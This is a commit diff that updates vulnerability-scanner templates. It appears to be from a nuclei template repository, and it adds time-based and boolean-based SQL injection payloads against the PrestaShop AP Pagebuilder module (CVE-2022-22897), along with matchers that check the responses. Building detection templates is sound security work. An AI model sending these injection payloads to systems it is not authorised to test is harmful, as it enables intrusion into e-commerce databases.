Merge pull request #9751 from mastercho/CVE-2022-22897

CVE 2022 22897
2024-05-20 09:20:02 +05:30 · 2024-05-20 09:20:02 +05:30 · 88039f98cd
parent 08c3dcf3aa 9604c8e294
commit 88039f98cd
2 changed files with 41 additions and 16 deletions
--- a/http/cves/2022/CVE-2022-22897.yaml
+++ b/http/cves/2022/CVE-2022-22897.yaml
@ -1,7 +1,7 @@
 id: CVE-2022-22897

 info:
-  name: PrestaShop Ap Pagebuilder <= 2.4.4 SQL Injection
+  name: PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection
  author: mastercho
  severity: critical
  description: |
@ -14,8 +14,6 @@ info:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22897
    - https://packetstormsecurity.com/files/cve/CVE-2022-22897
    - https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html
-    - https://github.com/ARPSyndicate/cvemon
-    - https://github.com/karimhabush/cyberowl
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
@ -35,6 +33,9 @@ info:

 http:
  - raw:
+      - |
+        GET /modules/appagebuilder/config.xml HTTP/1.1
+        Host: {{Hostname}}
      - |
        POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
        Host: {{Hostname}}
@ -44,21 +45,45 @@ http:

        leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)
      - |
-        GET /modules/appagebuilder/config.xml HTTP/1.1
+        POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Referer: {{RootURL}}
+        X-Requested-With: XMLHttpRequest
+
+        leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6644=6644-- yMwI
+      - |
+        POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Referer: {{RootURL}}
+        X-Requested-With: XMLHttpRequest
+
+        leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI
+
+    matchers-condition: or
+    matchers:
+      - type: dsl
+        name: time-based
+        dsl:
+          - 'duration_2>=6'
+          - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
+        condition: and
+
+      - type: dsl
+        name: blind-based
+        dsl:
+          - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
+          - 'contains(body_3, "content") && contains(body_3, "{{Hostname}}")'
+          - '!contains(body_4, "content") && !contains(body_4, "{{Hostname}}")'
+          - 'len(body_3) > 200 && len(body_4) <= 22'
+        condition: and

    extractors:
      - type: regex
        name: version
-        part: body_2
+        part: body_1
        internal: true
        group: 1
        regex:
          - "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
-    matchers:
-      - type: dsl
-        dsl:
-          - 'duration_1>=6'
-          - 'status_code_2 == 200 && compare_versions(version, "<= 2.4.4")'
-        condition: and
-# digest: 4a0a00473045022029319142054ee6f0ddb0bc16189b4c16e59004c93276cc82b97b27cc4d5a5efb022100bc6b21b2081ff6e7b7e7e71fab33e9484dfe3b6239cc8b11961d4ad845db15c1:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2023/CVE-2023-46347.yaml
+++ b/http/cves/2023/CVE-2023-46347.yaml
@ -39,8 +39,8 @@ http:
    matchers:
      - type: dsl
        dsl:
-          - duration>=6
-          - contains(content_type, "text/html")
-          - contains(header, 'PrestaShop')
+          - 'duration>=6'
+          - 'contains(content_type, "text/html")'
+          - 'contains(header, "PrestaShop")'
        condition: and
 # digest: 4b0a00483046022100b87838fd7d263c207e34f1457465b2f00642af421684161d37081d4b8ad0413b022100f379548beef0caf23301dc7d71e0a9d46c803654f1815f49a1c4d8838bc7761e:922c64590222798bb761d5b6d8e72950